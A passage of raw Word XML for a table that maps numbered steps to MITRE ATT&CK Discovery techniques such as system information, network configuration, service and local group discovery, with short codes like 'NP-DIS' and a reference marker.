                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700B98D1" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="260EC773" w14:textId="46758F4F" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C8A108B" w14:textId="4A7B8785" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A9780A" w14:textId="04B907E1" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D11489">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="017B7D4C" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25308B13" w14:textId="4AEDD92E" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="004F43B4" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B290E43" w14:textId="756930B3" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="211507D1" w14:textId="5D31C15E" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74FBFB85" w14:textId="5DCA9D95" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE38E2C" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C189C9" w14:textId="2707AAE2" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED9B0EC" w14:textId="000AE30B" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406518F6" w14:textId="598EA790" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="6DFC0BBD" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65163953" w14:textId="0A61DCB4" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="004F43B4" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4812BE02" w14:textId="5F7E4002" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12102A19" w14:textId="07CFCFDD" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="315E75EC" w14:textId="0E54C65F" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72A41FA0" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38BA8CC5" w14:textId="6C336A21" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="112BAC9E" w14:textId="3CB4DBC9" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5389F154" w14:textId="231F1AF5" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="34609D0E" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9BFC5E" w14:textId="69668B88" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="641E9E6C" w14:textId="096A65AC" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05B091D8" w14:textId="6A6BA908" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1007 System Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9C3696" w14:textId="22A92885" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B92FD30" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCF2CD1" w14:textId="0B7B5F84" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D7C191" w14:textId="0160901B" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D29B710" w14:textId="1161A4AB" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="5EB63E35" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444B7653" w14:textId="1093EE7C" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60807409" w14:textId="51CB1BE6" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF06E69" w14:textId="4F6885D6" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1069.001 Permission Groups Discovery: Local Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5065170E" w14:textId="24168A38" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9D1255" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0463E12E" w14:textId="170BF13F" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C896A0" w14:textId="70851401" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4741DC" w14:textId="1344E111" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="58D372ED" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="097D35FF" w14:textId="66B0D05C" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7749F11D" w14:textId="77FA2B08" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
